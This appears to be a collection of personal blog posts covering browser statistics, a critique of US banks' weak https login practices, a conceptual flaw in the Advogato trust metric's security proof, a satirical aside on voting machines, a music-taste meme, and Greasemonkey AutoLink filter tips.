Indistinguishable from Jesse

Even though the majority of visitors to squarefree.com use Gecko browsers, I can get a rough idea of general browser usage by looking at what browsers visitors are using when they find my site by searching for certain terms. Stats for some search terms that drove many users to my site between April 23 and May 27, sorted by percent Gecko:

I did something similar last July.

Tools used: Analog to identify popular searches, search-uas.bat, make-search-ua-table.html, "View Selection Source" feature in Firefox, "sort table" bookmarklet.

Here's what happens when you go to the web pages of some large US banks, and what happens when you try changing the homepage URL from "http" to "https" or vice versa.

Most of these banks make Critical SSL/TLS Mistake #1, having the login form be http and only submit to https. This protects against passive attacks, but does not protect against man-in-the-middle attacks. An attacker who can mount a passive attack can usually mount a man-in-the-middle attack with only a little more work, so these banks are barely more secure than sites that do not use https at all.

Of the banks that use https login forms at all, many make two smaller mistakes: their main page is http, which invites http links and bookmarks, and their login forms have long hostnames like "web.da-us.citibank.com", which are harder for users to verify than e.g. "www.citibank.com" or "citibank.com".

Many of the largest targets for financial fraud in the US are only defending themselves against passive attacks. Do they believe authenticated encryption isn't important in the US? Aren't these the same banks that blackmailed Mozilla developers into adding two of its most-hated features, "autocomplete=off" and "Cache-Control: no-store", claiming that any browser without these features was not secure enough for use on their sites? Banks in the US are heavily regulated, so why aren't they mandated to use https correctly?

Users either don't look for the lock icon at all, or can be tricked by the combination of a lock image and a statement in the page like "The moment you click Sign In and before your ID and passcode leave your computer, we encrypt them using Secure Sockets Layer (SSL) technology." Why is that? What can be done? What should be done?

The project for the graduate algorithms class I took in Fall was to compare two algorithms for a problem of our choice. I chose to compare two trust metrics, the Advogato trust metric and Google's PageRank. Trust metrics attempt to solve the following problem: "Given a directed graph where an edge from A to B means 'A trusts B', whom should I trust?".

In the case of Advogato, the nodes are Advogato accounts and the edges are explicit certifications. In the case of Google, the nodes are web pages and the edges are links.

A good trust metric makes it difficult for an attacker to gain a large amount of trust. More specifically, we might want the amount of trust an attacker gains to be at most linear in the cost of the attack. It helps to think in terms of "bad" nodes, which are controlled by the attacker, "confused" nodes, which trust bad nodes, and "good" nodes, which are neither bad nor confused.

Proving a statement about the cost of an attack requires assuming something about the cost of compromising or confusing each node. Advogato assumes that the cost of confusing a node is closely related to the node's capacity, which is a function of the node's distance from the root. PageRank assumes that the cost of confusing a page is closely related to the page's popularity, which is in turn estimated by the page's PageRank score.

I discovered a problem with Advogato's security proof: it bounds the trust by the final capacities of the confused nodes rather than their capacities before the attack. An attacker can confuse a single expensive (high-capacity) node and many cheap (capacity 1) nodes, then tell the expensive node to trust the cheap nodes. Now there are many confused nodes with substantial capacity, and the attacker can get get an amount of trust equal to a constant times the square of the cost of the attack.

PageRank does not have this problem. The PageRank score gained by the attacker is bounded by a small constant times the total PageRank-score-before-attack of the confused pages, no matter where the attacker makes confused or bad nodes link.

For more details, you can read my paper for the algorithms class.

Bash.org Instant Voting makes the vote links on bash.org submit your vote without taking you to another page. If the server accepts your vote, the script shows the item's new score, assuming nobody else has voted on the item since you loaded the page.

If I worked for Diebold and wanted to help republicans win, I wouldn't do something easily detectable like changing 2% of votes to be for my candidate or making some machines break down at 5pm to give the the working class a difficult time. Instead, I would work harder on usability for machines going to friendly districts.

With this scheme, blame for any election-tipping would mostly go to "user error" rather than poor design. Even better, the voters who committed the errors will mostly be democrats, which will make democrats look dumb once again.

This meme escaped from LiveJournal into the standards-based web design world. Sander passed it to me and Tristor also tried to pass it to me. Sander's post got me hooked on "Tower" by Vienna Teng, which I had somehow missed last time I visited her site, so I feel obligated to spread the meme. Also, the voices in my head said that if I didn't pass it on, I would be ridiculed by LiveJournal users and would not find any good music for a whole month.

Total volume of music files on my computer

11.5 GB in 2567 MP3s, 67 OGGs, and 24 WMAs.

Last CD I bought

To Touch The Stars. This CD contains Garry Novikoff's "Dog on the Moon", which was good enough to get me onto Garry's mailing list.

Playing right now

Enya - "The Celts". My Audioscrobbler profile lists the songs I've been listening to the most.

Five songs that mean a lot to me

"Threes" by Mercedes Lackey, Julia Ecklar (women's version), and Bob Kanefsky (men's version). Helen knew the song from reading the Mercedes Lackey story from which it came, and I knew the song from listening to filk music. The song came up in a conversation in Emily's room, either by me mentioning filk or Helen mentioning Lackey. I invited Helen to my room to hear it and other filk songs. We hooked up several weeks later and stayed together for over a year. "Threes" are also my favorite varying-chorus songs, closely followed by "Ballad of the Shape of Things" and "Seven Drunken Nights in Space".

"Terra's Theme" from Final Fantasy 6. Several days into FF6, I heard this theme after coming out of a cave, and felt like I had known it for my entire life. Yes, I know that's something an RPG character would say. Maybe I had heard someone play a self-arranged piano version of the song (Ezekiel Chang from Ross?).

Vertical Horizon - "Everything You Want". I first heard it on the radio when I was in a car with Sara Saperstein. She had heard the song before and mentioned that she liked it a lot. Ever since then, I have associated this song with her.

Kathy Mar - "The Word of God". A beautiful attempt to reconcile Christianity with science.

Joan Baez - "Through Your Hands".

Five songs that can make me cry

This was one of the easier questions. It's hard to pick my favorite songs, because there are many songs I like, but there are only a dozen songs that have ever made me cry.

Julia Ecklar - "The Phoenix".

Julia Ecklar / Jordin Kare - "Pushing the Speed of Light". You have to know some physics to understand this song.

Alanis Morissette - "Your House". My favorite example of irony in an Alanis song.

Evanescence - "Bring Me to Life". Amy Lee's voice (at the beginning) makes me cry, not the lyrics. I learned about this song be attending a cappella concerts -- I heard three good a cappella versions of the song before I heard Evanescence's version.

Tish Hinojosa - "Donde Voy" is the only non-English song that makes me cry. I found this song soon after listening to the treasure map CD Voce, which contains Tish Hinojosa's "Las Golondrinas".

Five favorite that I've known for over a month

Blackmore's Night - "Beyond the Sunset"

Blackmore's Night - "Cartouche"

Claremont Shades - "Techno Fusion"

Inoj - "Time after Time"

The Corrs - "Breathless"

How I discover good music

• Friends with similar tastes in music, including Jeri, Ishani, James, and Michelle.
• My parents.
• Treasure map CDs with songs by many artists, such as Voce and the Magnatune rock compilation.
• Parodists such as Weird Al, The Capitol Steps, and Bob Kanefsky.
• A cappella concerts and CDs. I have Helen to thank for introducing me to a cappella music, which is great both itself and as a way to learn about a wide variety of music.
• Amazon recommendations. Audioscrobbler has the potential to unseat Amazon for this position in my life.
• Radio.

Five people to whom I'm passing the baton

• Matthew Thomas.
• Grey Hodge, who jumped up and down in #bs begging me to pass the baton to him. Tristor already got him.
• Adam Sacarny, the only person in my blogroll who has written much about music.
• Michelle, who knows about a world of Christian music that I'm missing out on for the silly reason that I'm an atheist. She introduced me to Jack Johnson and was indirectly responsible for introducing me to both Jennifer Knapp (through Holly) and Avalon (by bringing me to a Christian concert).
• Jeri, who has introduced me to many good artists. She does not have a blog and hereby must start one.
• Ishani, who introduced me to Bryan Adams, Hoobastank, and Josh Groban. She does not have a blog and hereby must start one.

If you've made new AutoLink filters, please post them in comments wrapped in <pre> or post them in your blog and use trackback. Feel free to request filters, too.

For tutorials and references on using regular expressions in JavaScript, see http://del.icio.us/jesser/regexp+javascript.

Tips for testing filters:

• Use the Edit button in Greasemonkey 0.3.3+. As soon as you save your changes in your text editor, they will apply the next time you load or reload a page.
• Create a test page similar to autolink-test.html. Then you can test each change by saving autolink.user.js in your text editor and reloading the test page.
• Use Thomas Russell's regular expression tool or the JavaScript Environment to test your regular expressions.

I made some changes to my WordPress install to make it easier to post code in comments. You can now post code by enclosing it in <code> or <pre>. You still have to escape <, >, and & as &lt;, &gt;, and &amp;, but you no longer have to worry about wrapping, indentation, and smart quotes.

Making these changes was harder than I expected.